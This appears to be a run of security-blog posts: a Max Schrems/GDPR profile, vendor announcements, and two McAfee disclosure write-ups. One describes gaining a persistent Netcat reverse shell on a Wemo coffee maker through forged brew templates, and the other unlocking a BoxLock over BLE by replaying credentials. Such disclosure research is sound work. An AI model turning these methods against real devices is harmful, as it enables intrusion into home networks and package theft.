And then, according to Schrems’ website, only silence and inaction from both Facebook and the Irish Data Protection Commissioner’s Office followed. There were no meaningful changes from the company. And no stronger enforcement from the government.
Frustrating as it may have been, Schrems kept pressing. Luckily, according to Glancy, he was just the right man for the job.
“He is innately curious,” Glancy said. “Once he sees something that doesn’t quite seem right, he follows it up to the very end.”
Safe Harbor? More like safety not guaranteed
On June 5, 2013, multiple newspapers exposed two massive surveillance programs in use by the US National Security Agency. One program, then called PRISM (now called Downstream), implicated some of the world’s largest technology companies, including Facebook.
Schrems responded by doing what he did best: He filed yet another complaint against Facebook—his 23rd—with the Irish Data Protection Commissioner. Facebook Ireland, Schrems claimed, was moving his data to Facebook Inc. in the US, where, according to The Guardian, the NSA enjoyed “mass access” to user data. Though Facebook and other companies denied their participation, Schrems doubted the accuracy of these statements.
“There is probable cause to believe that ‘Facebook Inc’ is granting the NSA mass access to its servers that goes beyond merely individual requests based on probable cause,” Schrems wrote in his complaint. “The statements by ‘Facebook Inc’ are in light of the US laws not credible, because ‘Facebook Inc’ is bound by so-called ‘gag orders.’”
Schrems argued that, when his data left EU borders, EU law required that it receive an “adequate level of protection.” Mass surveillance, he said, violated that.
The Irish Data Protection Commissioner disagreed. The described EU-to-US data transfer was entirely legal, the Commissioner said, because of Safe Harbor, a data privacy carve-out approved much earlier.
In 1995, the EU adopted the Data Protection Directive, which, up until 2018, regulated the treatment of EU citizens’ personal data. In 2000, the European Commission approved an exception to the law: US companies could agree to a set of seven principles, called the Safe Harbor Privacy Principles, to allow for data transfer from the EU to the US. This self-certifying framework proved wildly popular. For 15 years, nearly every single company that moved data from the EU to the US relied, at least briefly, on Safe Harbor.
Unsatisfied, Schrems asked the Irish High Court to review the Data Protection Commissioner’s inaction. In October 2013, the court agreed. Schrems celebrated, calling out the Commissioner’s earlier decision.
“The [Data Protection Commissioner] simply wanted to get this hot potato off his table instead of doing his job,” Schrems said in a statement at the time. “But when it comes to the fundamental rights of millions of users and the biggest surveillance scandal in years, he will have to take responsibility and do something about it.”
Less than one year later, the Irish High Court came back with its decision—the Court of Justice for the European Union would need to review Safe Harbor.
On March 24, 2015, the Court heard oral arguments for both sides. Schrems’ legal team argued that Safe Harbor did not provide adequate protection for EU citizen’s data. The European Commission, defending the Irish DPC’s previous decision, argued the opposite.
When asked by the Court how EU citizens might best protect themselves from the NSA’s mass surveillance, the lawyer arguing in favor of Safe Harbor made a startling admission:
“You might consider closing your Facebook account, if you have one,” said Bernhard Schima, advocate for the European Commission, all but admitting that Safe Harbor could not protect EU citizens from overseas spying. When asked more directly if Safe Harbor provided adequate protection of EU citizens’ data, the European Commission’s legal team could not guarantee it.
On September 23, 2015, the Court’s advocate general issued his initial opinion—Safe Harbor, in light of the NSA’s mass surveillance programs, was invalid.
“Such mass, indiscriminate surveillance is inherently disproportionate and constitutes an unwarranted interference with the rights [to respect for privacy and family life and protection of personal data,]” the opinion said.
Less than two weeks later, the entire Court of Justice agreed.
Ever a lawyer, Schrems responded to the decision with a 5,500-word blog post (assigned a non-commercial Creative Commons public copyright license) exploring current data privacy law, Safe Harbor alternatives, company privacy policies, a potential Safe Harbor 2.0, and mass surveillance. Written with “limited time,” Schrems thanked readers for pointing out typos.
The General Data Protection Regulation
Before the Court of Justice struck down Safe Harbor, before Edward Snowden shed light on the NSA’s mass surveillance, before Schrems received a 1,200-page PDF documenting his digital life, and before that fateful guest presentation in professor Glancy’s privacy seminar at Santa Clara University School of Law, a separate plan was already under way to change data privacy.
In November 2010, the European Commission, which proposes legislation for the European Union, considered a new policy with a clear goal and equally clear title: “A comprehensive approach on personal data protection in the European Union.”
Many years later, it became GDPR.
During those years, the negotiating committees looked to Schrems’ lawsuits as highly informative, Glancy said, because Schrems had successfully proven the relationship between the European Charter of Fundamental Human Rights and its application to EU data privacy law. Ignoring that expertise would be foolish.
“Max [Schrems] was a part of just about all the committees working on [GDPR]. His litigation was part of what motivated the adoption of it,” Glancy said. “The people writing the GDPR would consult him as to whether it would solve his problems, and parts of the very endless writing process were also about what Max [Schrems] was not happy with.”
Because Schrems did not respond to multiple interview requests, it is impossible to know his precise involvement in GDPR. His Twitter and blog have no visible, corresponding entries about GDPR’s passage.
However, public records show that GDPR’s drafters recommended several areas of improvement in the year before the law passed, including clearer definitions of “personal information,” stronger investigatory powers to the EU’s data regulators, more direct “data portability” to allow citizens to directly move their data from one company to another while also obtaining a copy of that data, and better transparency in how EU citizens’ online profiles are created and targeted for ads.
GDPR eventually became a sweeping set of 99 articles that tightly fasten the collection, storage, use, transfer, and disclosure of data belonging to all EU citizens, giving those citizens more direct control over how their data is treated.
For example, citizens have the “right to erasure,” in which they can ask a company to delete the data collected on them. Citizens also have the “right to access,” in which companies must provide a copy of the data collected on a person, along with information about how the data was collected, who it is shared with, and why it is processed.
Approved by a parliamentary vote in April 2016, GDPR took effect two years later.
GDPR’s immediate and future impact
Since then, compliance looks less like emails and more like penalties.
Early this year, Google received its €50 million ($57 million) fine out of France. Last year, a Portuguese hospital received a €400,000 fine for two alleged GDPR violations. Because of a July 2018 data breach, a German chat platform got hit with a €20,000 fine. And in the reported first-ever GDPR notice from the UK, Canadian political consultancy—and murky partner to Cambridge Analytica—AggregateIQ received a notice about potential fines of up to €20 million.
To Noyb, the fines are good news. Gaëtan Goldberg, a privacy lawyer with the NGO, said that data privacy law compliance has, for many years, been lacking. Hopefully GDPR, which Goldberg called a “major step” in protecting personal data, can help turn that around, he said.
“[We] hope to see strong enforcement measures being taken by courts and data protection authorities around the EU,” Goldberg said. “The fine of 50 [million] euros the French CNIL imposed on Google is a good start in this direction.”
The future of data privacy
Last year, when Senator Warner told Zuckerberg that “the era of the Wild West in social media is coming to an end,” he may not have realized how quickly that would come true. In July 2018, California passed a statewide data privacy law called the California Consumer Privacy Act. Months later, three US Senators proposed their own federal data privacy laws. And just this month, the Government Accountability Office recommended that Congress pass a data privacy law similar to GDPR.
Data privacy is no longer a concept. It is the law.
In the EU, that law has released a torrent of legal complaints. Hours after GDPR came into effect, Noyb lodged a series of complaints against Google, Facebook, Instagram, and WhatsApp.
Goldberg said the group’s legal complaints are one component of meaningful enforcement on behalf of the government. Remember: Google’s massive penalty began with an investigation that the French authorities said started after it received a complaint from Noyb.
Separately, privacy group Privacy International filed complaints against Europe’s data-brokers and advertising technology companies, and Brave, a privacy-focused web browser, filed complaints against Google and other digital advertising companies.
Google and Facebook did not respond to questions about how they are responding to the legal complaints. Facebook also did not respond to questions about its previous legal battles with Schrems.
Electronic Frontier Foundation International Director Danny O’Brien wrote last year that, while we wait for the results of the above legal complaints, GDPR has already motivated other privacy-forward penalties and regulations around the world:
“In Italy, it was competition regulators that fined Facebook ten million euros for misleading its users over its personal data practices. Brazil passed its own GDPR-style law this year; Chile amended its constitution to include data protection rights; and India’s lawmakers introduced a draft of a wide-ranging new legal privacy framework.”
As the world moves forward, one man—the one who started it all—might be conspicuously absent. Last year, Schrems expressed a desire to step back from data privacy law. If anything, he said, it was time for others to take up the mantle.
“I know I’m going to be deeply engaged, especially at the beginning, but in the long run [Noyb] should absolutely not be Max’s personal NGO,” Schrems told The Register in a January 2018 interview. Asked to clarify about his potential future beyond privacy advocacy, Schrems said: “It’s retirement from the first line of defense, let’s put it that way… I don’t want to keep bringing cases for the rest of my life.”
Surprisingly, for all of Schrems’ public-facing and public-empowering work, his interviews and blog posts sometimes portray him as a deeply humble, almost shy individual, with a down-to-earth sense of humor, too. When asked during a 2016 podcast interview if he felt he would be remembered in the same vein as Edward Snowden, Schrems bristled.
“Not at all, actually,” Schrems said. “What I did is a very conservative approach. You go to the courts, you have your case, you bring it and you do your thing. What Edward Snowden did is a whole different ballgame. He pretty much gave up his whole life and has serious possibilities to some point end up in a US prison. The worst thing that happened to me so far was to be on that security list of US flights.”
During the same interview, Schrems also deflected his search result popularity.
“Everyone knows your name now,” the host said. “If you Google ‘Schrems,’ the first thing that comes up is ‘Max Schrems’ and your case.”
“Yeah but it’s also a very specific name, so it’s not like ‘Smith,’” Schrems said, laughing. “I would have a harder time with that name.”
If anything, the popularity came as a surprise to Schrems. Last year, in speaking to Bloomberg, he described Facebook as a “test case” when filing his original 22 complaints.
“I thought I’d write up a few complaints,” Schrems said. “I never thought it would create such a media storm.”
Glancy described Schrems’ initial investigation into Facebook in much the same way. It started not as a vendetta, she said, but as a courtesy.
“He started out with a really charitable view of [Facebook],” Glancy said. “At some level, he was trying to get Facebook to wake up and smell the coffee.”
That’s the Schrems that Glancy knows best, a multi-faceted individual who makes time for others and holds various interests. A man committed to public service, not public spotlight. A man who still calls and emails her with questions about legal strategy and privacy law. A man who drove down the California coast with some friends during spring break. Maybe even a man who is tired of being seen only as a flag-bearer for online privacy. (He describes himself on his Twitter profile as “(Luckily not only) Law, Privacy and Politics.)
“At some level, he considers himself a consumer lawyer,” Glancy said. “He’s interested in the ways in which to empower the little guy, who is kind of abused by large entities that—it’s not that they’re targeting them, it’s that they just don’t care. [The people’s] rights are not being taken account of.”
With GDPR in place, those rights, and the people they apply to, now have a little more firepower.
The post Max Schrems: lawyer, regulator, international man of privacy appeared first on Malwarebytes Labs.
The keeper of the internet’s ‘phone book’ is urging a speedy adoption of security-enhancing DNS specifications
The post Escalating DNS attacks have domain name steward worried appeared first on WeLiveSecurity
In their own words:
We are proud to introduce our newest malware analyzer that now supports Android platform - Dr.Web vxCube 1.2. It maintains the same fast and versatile functionality when working with the Android files. Dr.Web vxCube 1.2 conducts a thorough analysis of APK files and provides in-depth reports on their behavior in the sandbox environment, including information about SMS and calls they could try to make. Moreover, each report includes manifest information with a full list of app’s permissions, activities, broadcast receivers and services.To view the details generated by Dr.Web vxCube make sure to click on the behavior tab:
To demonstrate some of the features, lets take a look at a few malware samples:
Detection summaryAt the top of the detailed report we can clearly see a detection summary for this APK file. Note that it display a verdict based on execution behavior, this verdict may complement Doctor Web's antivirus engine running in VirusTotal.
Malicious functionsWe can see the app is sending SMS spam with malicious URLs:
Network activityThe network activity map, visually shows where the traffic goes, along with protocol and address information.
Connect the dotsWith VT Graph you can see all the relationships above in a single nodes and arcs graph enriched with the historical knowledge of the VirusTotal dataset. Forget about having dozens of open tabs to investigate a single incident, one canvas is all you need.
Moreover, as you can see above, you can easily generate an embeddable graph object in order to display your investigation in sites other than VT Graph.
Digging deeperVT Enterprise users can try some more advanced searches using search modifiers in order to identify interesting samples based on behavioral observations and other structural and in-the-wild metadata.
For example you can search for filenames within the behavior data:
Similarly, the behavior-scoped modifiers can be combined with any other facets in order to pinpoint not only malware families but also their command and command-and-control servers, drop-zones, additional infrastructure, etc.
type:apk androguard:"android.permission.READ_PHONE_STATE" behavior_network:http positives:10+
More insights and giving back to Doctor Web and the communityIf you are as grateful as we are for this new insights into Android apps, you can give back to Doctor Web and the community by helping them receive more APKs so that they can continue to improve their defenses. The easiest way to do this is through a community-developed VirusTotal App that will make the task of uploading new APKs to VirusTotal a no-brainer:
We look forward to keep working close with Doctor Web, meanwhile we continue to encourage other sandbox setups to join the multisandbox project.
Facebook has told developers that it prohibits partners from sharing any sensitive user information
IOT devices are notoriously insecure and this claim can be backed up with a laundry list of examples. With more devices “needing” to connect to the internet, the possibility of your WiFi enabled toaster getting hacked and tweeting out your credit card number is, amazingly, no longer a joke.
With that in mind, I began to investigate the Mr. Coffee Coffee Maker with Wemo (WeMo_WW_2.00.11058.PVT-OWRT-Smart) since we had previously bought one for our research lab (and we don’t have many coffee drinkers, so I didn’t feel bad about demolishing it!). My hope was to build on previous work done by my colleague Douglas McKee (@fulmetalpackets) and his Wemo Insight smart plug exploit. Finding a similar attack vector absent in this product, I explored a unique avenue and was able to find another vulnerability. In this post I will explore my methodology and processes in detail.
All Wemo devices have two ways of communicating with the Wemo App, remotely via the internet or locally directly to the Wemo App. Remote connectivity is only present when the remote access setting is enabled, which it is by default. To allow the Wemo device to be controlled remotely, the Wemo checks Belkin’s servers periodically for updates. This way the Wemo doesn’t need to open any ports on your network. However, if you are trying to control your Wemo devices locally, or the remote access setting is disabled, the Wemo app connects directly to the Wemo. All my research is based on local device communication with the remote access setting turned off.
To gain insight on how the coffee maker communicates with its mobile application, I first set up a local network capture on my cellphone using an application called “SSL Capture.” SSL Capture allows the user to capture traffic from mobile applications. In this case, I selected the Wemo application. With the capture running, I went through the Wemo app and initiated several standard commands to generate network traffic. By doing this, I was able to view the communication between the coffee maker and the Wemo application. One of the unique characteristics about the app is that the user is able schedule the coffee maker to brew at a specified time. I made a few schedules and saved them.
I began analyzing the network traffic between the phone application and the Mr. Coffee machine. All transmissions between the two devices were issued in plaintext, meaning no encryption was used. I also noticed that the coffee maker and the mobile app were communicating over a protocol called UPNP (Universal Plug and Play), which has preset actions called “SOAP ACTIONS.” Digging deeper into the network capture from the device, I saw the SOAP action “SetRules.” This included XML content that pertained to the “brew schedule” I had set from the mobile application.
A Mr. Coffee “brew” being scheduled.
At this point I was able to see how the Wemo mobile application handled brewing schedules. Next, I wanted to see if the coffee maker performed any sort of validation of these schedules so I went back into the mobile application and disabled them all. I then copied the data and headers from the network capture and used the Linux Curl command to send the packet back to the coffee maker. I got the return header status of “200” which means “OK” in HTTP. This indicated there was no validation of the source of brewing schedules; I further verified with the mobile application and the newly scheduled brew appeared.
Curl command to send a “Brew” schedule to the Wemo Coffee maker.
Screenshot of the Curl command populating the Wemo app with a brew schedule
At this point I could change the coffee maker’s brew schedule without ever using the Wemo mobile application. To understand how the schedules were stored on the Wemo coffee maker, I decided to physically disassemble it and look at the electronics inside. Once disassembled, I saw there was a Wemo module connected to a larger PCB responsible for controlling the functions of the coffee maker. I then extracted the Wemo module from the coffee maker. This looked almost Identical to the Wemo module that was in the Wemo Insight device. I leveraged Doug’s blog on exploitation of the Wemo Insight to replicate the serial identification, firmware extraction, and root password change. After I obtained root access via the serial port on the Wemo device, I began to investigate the way in which the Wemo application is initiated from the underlying Linux Operating System. While looking through some of the most common Linux files and directories, I noticed something odd in the “crontab” file (used in Linux to execute and schedule commands).
It appeared the developers decided to take the easy route and used the Linux crontab file to schedule tasks instead of writing their own brew scheduling function. The crontab entry was the same as the scheduled brew I sent via the Wemo application (coffee-3) and executed as root. This was especially interesting; if I could add some sort of command to execute from the replayed UPNP packet, I could potentially execute my command as root over the network.
With the firmware dumped, I decided to look at the “rtng_run_rule” executable that was called in the crontab. The rtng_run_rule is a Lua script. As Lua is a scripting language, it was written in plaintext and not compiled like all the other Wemo executables. I followed the flow of execution until I noticed the rule passing parameters to a template for execution. At this point, I knew it would be useless trying to inject commands directly into the rule and instead looked at modifying the template performing the execution.
I went back to the Wemo mobile application network captures and started to dig around again. I found the application also sends the templates to the Wemo coffee maker. If I could figure out how to modify the template and still have the Wemo think it is valid, I could get arbitrary code execution.
Template with the correct syntax to pass Wemo’s verification
There were 3 templates sent over, “do,” “do_if,” and “do_unless.” Each of the templates were Lua scripts and encoded with base64. Based on this, I knew it would be trivial to insert my own code; the only remaining challenge would be the MD5 hash included at the top of the template. As it turned out, that was hardly an obstacle.
I created an MD5 hash of the base-64 decoded Lua script and the base64 encoded script separately, simply to see if one or the other matched the hash that was being sent; however, neither matched the MD5 being sent in the template. I began to think the developers used some sort of HMAC or clever way to hash the template, which would have made it much harder to upload a malicious template. Instead, I was astounded to find out that it was simply the base64 code prepended by the string “begin-base64 644 <template name>” and appended with the string “====.”
At last I had the ability to upload any template of my choice and have it pass all the Wemo’s verification steps necessary to be used by a scheduled rule.
I appended a new template called “hack” and added a block of code within the template to download and execute a shell script.
Within that shell command, I instructed the Mr. Coffee Coffee Maker with Wemo to download a cross-complied version of Netcat so I can get a reverse shell, and also added an entry to “rc.local.” This was done so that if the coffee maker was power cycled, I would have persistent access to the device after reboot, via the Netcat reverse shell.
The final aspect of this exploit was to use what I learned earlier to schedule a brew with my new “hack” template executing my shell script. I took the schedule I was able to replay earlier and modified it to have the “hack” template execute 5 minutes from the time of sending. I did have to convert the time value required into the epoch time format.
Converting time to Epoch time.
Now, I sat back and waited as the coffee maker (at my specified time delay) connected to my computer, downloaded my shell script, and ran it. I verified that I had a reverse shell and that it ran as intended, perfectly.
This vulnerability does require network access to the same network the coffee maker is on. Depending on the complexity of the user’s password, WiFi cracking can be a relatively simple task to accomplish with today’s computing power. For example, we demonstrate a quick and easy brute force dictionary attack to crack a semi-complex WPA2 password (10 characters alpha-numeric) in the demo for the Wemo Insight smart plug. However, even a slightly more complex password, employing special characters, would exponentially increase the difficulty of a brute force attack. We contacted Belkin (who owns Wemo) on November 16th, 2018 and disclosed this issue to them. While the vendor did not respond to this report, we were pleasantly surprised to see that the latest firmware update has patched the issue. Despite a general lack of communication, we’re delighted to see the results of our research further securing home automation devices.
This vulnerability shows that not all exploits are overly complicated or require an exceptional amount of effort to pull off, if you know what to look for. This vulnerability exists solely because a few poor coding decisions were made in conjunction with a lack of input sanitation and validation. Even though this target does not contain sensitive data and is limited to your local network, it doesn’t mean malicious hackers are not targeting IOT devices like this. These devices may serve as a sought-after target as they are often overlooked from a security standpoint and can provide a simple and unmonitored foothold into your home or business network. It is very important for any consumer, when purchasing new IOT gadgets, to ask themself: “Does this really need to be connected to the internet?” In the case of a coffee maker, I’ll let you be the judge.
2018 was another record-setting year in the continuing trend for consumer online shopping. With an increase in technology and efficiency, and a decrease in cost and shipping time, consumers have clearly made a statement that shopping online is their preferred method.
Chart depicting growth of online, web-influenced and offline sales by year.1
In direct correlation to the growth of online shopping preferences is the increase in home delivery, and correspondingly, package theft. Though my initial instinct was to attempt to recreate YouTuber Mark Rober’s glitter bomb, I practiced restraint and instead settled on investigating an innovative product called the BoxLock (BoxLock Firmware: 94.50 or below). The BoxLock is a smart padlock that you can setup outside of your house to secure a package delivery container. It can be opened either via the mobile application (Android or iPhone) or by using the built-in barcode scanner to scan a package that is out for delivery. The intent is that delivery drivers will use the BoxLock to unlock a secure drop box and place your package safely out of reach of package thieves. The homeowner can then unlock the lock from their phone using the app to retrieve their valuable deliveries.
Since I am more of a hardware researcher, the first step I did when I got the BoxLock was to take it apart to view the internals.
With the device disassembled and the main PCB extracted, I began to look for interesting pins, mainly UART and JTAG connections. I found 5 pins below the WiFi module that I thought could be UART, but after running it through a logic analyzer I didn’t see anything that looked like communication.
The BoxLock uses a SOC (System-on-a-Chip) which contains the CPU, RAM, ROM, and flash memory all in one. However, there was still an additional flash chip which I thought was odd. I used my Exodus Intelligence hardware interface board to connect to the SPI flash chip and dump the contents.
Exodus Intelligence XI Hardware Interface Board
The flash chip was completely empty. My working theory is that this flash chip is used to store the barcodes of packages out for delivery. There could also have been in issue with my version of Flashrom, which is the software I used to dump flash. The only reason I question my version of Flashrom is because I had to compile it myself with support for the exact flash chip (FT25H04S), since it is not supported by default.
The Main SOC (ATSAMD21J18)
Even though I couldn’t get anything from that flash chip, my main target here was the SOC. On the underside of the Process Control Board (PCB), I identified two tag-connect connection ports. I identified the SWD (Serial Wire Debug) pins located on the SOC (Pin 57 and 58 on the image above) and very slowly and carefully visually traced the paths to the smaller Tag-Connect connection.
Adafruit Feather M0 Development board
Since I have not done much JTAG analysis before, I grabbed an Adafruit Feather M0 that we had in our lab for testing, since the Feather uses the exact same SOC and WiFi chip as the BoxLock. The Adafruit Feather has excellent documentation on how to connect to the SOC via SWD pins I traced. I used Atmel Studio to read the info off the ATSAMD21 SOC; this showed me how to read the fuses as well as dump the entire flash off the Adafruit Feather.
SWD information of the Adafruit Feather M0
Atmel Studio also will let you know if the device has the “Security Bit” enabled. When set, the security bit is used to disable all external programming and debugging interfaces, making memory extraction and analysis extremely difficult. Once the security bit is set, the only way to bypass or clear the bit is to completely erase the chip.
Showing how to set the security bit on the Adafruit Feather M0
After I felt comfortable with the Adafruit feather I connected the BoxLock to a Segger JLink and loaded up Atmel Studio. The Segger JLink is a debugging device that can be used for JTAG and SWD. I was surprised that the developers set the security bit; this is a feature often overlooked in IOT devices. However, with the goal of finding vulnerabilities, this was a roadblock. I started to look elsewhere.
Segger JLink used for SWD communication
After spending some time under the microscope, I was able to trace back the larger Tag-Connect port to the BLE (Bluetooth Low Energy) module. The BLE module also has a full SOC which could be interesting to look at, but before I began investigating the BLE chip I still had two vectors to look at first: BLE and WiFi network traffic.
BLE is different to Bluetooth. The communication between BLE devices is secured by the use of encryption, whose robustness depends on the pairing mode used and BLE allows a few different pairing modes; the least secure “Just Works ” pairing mode is what the BoxLock is using. This mode allows any device to connect to it without the pin pairing that normal Bluetooth connections are known for. This means BLE devices can be passively intercepted and are susceptible to MITM (Man in The Middle) attacks.
BLE roles are defined at the connection layer. GAP (Generic Access Profile) describes how devices identify and connect to each other. The two most important roles are the Central and Peripheral roles. Low power devices like the BoxLock follow the Peripheral role and will broadcast their presence (Advertisement). More powerful devices, such as your phone, will scan for advertising devices and connect to them (this is the Central role). The communication between the two roles is done via special commands usually targeted at a GATT (Generic Attributes) services. GATT services can be standard and generic, such as the command value 0x180F, which is the Battery Service. Standardized GATT services help devices communicate with one another without the need for custom protocols. The GATT services present on the BoxLock were all custom, which means they will be displayed as “Unknown Service” when enumerated in a Bluetooth/BLE app. I chose Nordic’s NRF Connect, available in both the Apple and Android app stores or as a desktop application.
NRF Connect application connected to the BoxLock via BLE
Next, I began searching for UUIDs and the keyword “GATT”. I was able to find the entire list of GATT services and what they pertain to.
GATT services UUID descriptions
The one I was most interested in was labeled as “Command Service”, where the unlock GATT command is sent to. To try it out, I used the NRF Connect application to send a GATT “sendOpenSignal” command with an attribute value of “2”.
How the Android application sends the unlock command
It was just that simple; lo and behold, the BoxLock unlocked!
I was amazed; the phone that I used to send the GATT command over had never connected to the BoxLock before and did not have the BoxLock application installed, yet it was able to unlock the BoxLock. (The vulnerable application version is v1.25 and below).
Continuing to explore the other GATT UUIDs, I was able to read the WiFi SSID, access token, user’s email, and client ID directly off the device. I was also able to write any of these same values arbitrarily.
Information that you can see about the BoxLock via the NRF Connect application
The mandatory identifiers required for the BoxLock to unlock are the access token, user email, and client ID. If those values are not present the device will not authenticate via the cloud API and will not unlock.
The most glaring issue with having all these fields readable and writeable is that I was able to successfully replay them on the device, ultimately bypassing any authentication which led to the BoxLock unlocking.
From my testing, these values never expired and the only way I found that the device cleared the credentials necessary to authenticate was when I removed the battery from the BoxLock. The BoxLock battery is “technically” never supposed to be removed, but since I physically disassembled the lock, (which took a decent amount of effort), I was able to test this.
Even though I was able to unlock the BoxLock, I still wanted to explore one other common attack vector. I analyzed the network traffic between the device and the internet. I quickly noticed that, apart from firmware updates, device-to-cloud traffic was properly secured with HTTPS and I could not easily get useful information from this vector.
I do not currently have an estimate of the extent of this product’s deployment, so I cannot comment on how wide the potential impact could have been if this issue had been found by a malicious party. One constraint to the attack vector is that it requires BLE, which communicates from a distance of approximately 30 or 40 feet. However, for someone looking to steal packages this would not be a challenge difficult to overcome, as the unlocking attack could be completed very quickly and easily, making the bar for exploitation simply a smart phone with Bluetooth capability. The ease and speed of the exploit could have made for an enticing target for criminals.
I want to take a moment to give some very positive feedback on this vendor. Vulnerability disclosure can be a challenging issue for any company to deal with, but BoxLock was incredibly responsive, easy to work with and immediately recognized the value that McAfee ATR had provided. Our goal is to eliminate vulnerabilities before malicious actors find them, as well as illuminate security issues to the industry so we can raise the overall standard for security. BoxLock was an excellent example of this process at work; the day after disclosing the vulnerability, they set up a meeting with us to discuss our findings, where we proposed a mitigation plan. The BoxLock team set a plan in place to patch not only the BoxLock firmware but the mobile applications as well. Within a week, the vendor created a patch for the vulnerability and updated the mobile apps to force mandatory update to the patched firmware version. We tested the firmware and app update and verified that the application properly clears credentials after use on the vulnerable firmware. We also tested the new firmware which clears the credentials even without the mobile app’s interaction.
IoT security has increasingly become a deciding factor for consumers. The process of vulnerability disclosure is an effective method to increase collaboration between vendors, manufacturers, the security community and the consumer. It is our hope that vendors move towards prioritizing security early in the product development lifecycle. We’d like to thank BoxLock for an effective end-to-end communication process, and we’re pleased to report that this significant flaw has been quickly eradicated. We welcome any questions or comments on this blog!
We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.
Mobile Connectivity and the Evolving Threat Landscape
These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.
Growing Partnerships to Protect What Matters
Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.
We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.
We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.
The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.
GoBuster is a Go-based tool used to brute-force URIs (directories and files) in web sites and DNS subdomains (with wildcard support) – essentially a directory/file & DNS busting tool.
The author built YET ANOTHER directory and DNS brute forcing tool because he wanted..
- … something that didn’t have a fat Java GUI (console FTW).
- … to build something that just worked on the command line.
- … something that did not do recursive brute force.
Visit us at Booth #4435 and let us know how our experts can help you ensure your security program goes beyond one-size-fits-all solutions.
Visit us at Booth #4435 and let us know how our experts can help you ensure your security program goes beyond one-size-fits-all solutions.
This evening at a press event to kickoff MWC Barcelona, I had the pleasure of joining CEO Satya Nadella and Technical Fellow Alex Kipman onstage to talk in depth about Microsoft’s worldview for the intelligent cloud and intelligent edge.
As part of today’s press event, we also introduced the world to HoloLens 2.
This is a tremendously exciting time for Microsoft, our partners, our customers, the computing industry and indeed the world. The virtually limitless computing power and capability of the cloud combined with increasingly intelligent and perceptive edge devices embedded throughout the physical world create experiences we could only imagine a few short years ago.
When intelligent cloud and intelligent edge experiences are infused with mixed reality, we have a framework for achieving amazing things and empowering even more people.
Today represents an important milestone for Microsoft. This moment captures the very best efforts and passion of numerous teams spanning Azure, HoloLens, Dynamics 365 and Microsoft Devices — this truly is a moment where the sum is greater than the parts. From cutting-edge hardware design to mixed reality-infused cloud services, today’s announcements represent the collective work of many teams. And none of this would be possible without our passionate community of customers, partners and developers.
On behalf of everyone on the team, it is my privilege to introduce you to HoloLens 2 and all the announcements we made today to kick off MWC Barcelona.
Introducing HoloLens 2
Since the release of HoloLens in 2016 we have seen mixed reality transform the way work gets done. We have unlocked super-powers for hundreds of thousands of people who go to work every day. From construction sites to factory floors, from operating rooms to classrooms, HoloLens is changing how we work, learn, communicate and get things done.
We are entering a new era of computing, one in which the digital world goes beyond two-dimensional screens and enters the three-dimensional world. This new collaborative computing era will empower us all to achieve more, break boundaries and work together with greater ease and immediacy in 3D.
Today, we are proud to introduce the world to Microsoft HoloLens 2.
Our customers asked us to focus on three key areas to make HoloLens even better. They wanted HoloLens 2 to be even more immersive and more comfortable, and to accelerate the time-to-value.
Immersion is greatly enhanced by advancements across the board, including in the visual display system, making holograms even more vibrant and realistic. We have more than doubled the field of view in HoloLens 2, while maintaining the industry-leading holographic density of 47 pixels per degree of sight. HoloLens 2 contains a new display system that enables us to achieve these significant advances in performance at low power. We have also completely refreshed the way you interact with holograms in HoloLens 2. Taking advantage of our new time-of-flight depth sensor, combined with built-in AI and semantic understanding, HoloLens 2 enables direct manipulation of holograms with the same instinctual interactions you’d use with physical objects in the real world. In addition to the improvements in the display engine and direct manipulation of holograms, HoloLens 2 contains eye-tracking sensors that make interacting with holograms even more natural. You can log in with Windows Hello enterprise-grade authentication through iris recognition, making it easy for multiple people to quickly and securely share the device.
Comfort is enhanced by a more balanced center of gravity, the use of light carbon-fiber material and a new mechanism for donning the device without readjusting. We’ve improved the thermal management with new vapor chamber technology and accounted for the wide physiological variability in the size and shape of human heads by designing HoloLens 2 to comfortably adjust and fit almost anyone. The new dial-in fit system makes it comfortable to wear for hours on end, and you can keep your glasses on because HoloLens 2 adapts to you by sliding right over them. When it’s time to step out of mixed reality, flip the visor up and switch tasks in seconds. Together, these enhancements have more than tripled the measured comfort and ergonomics of the device.
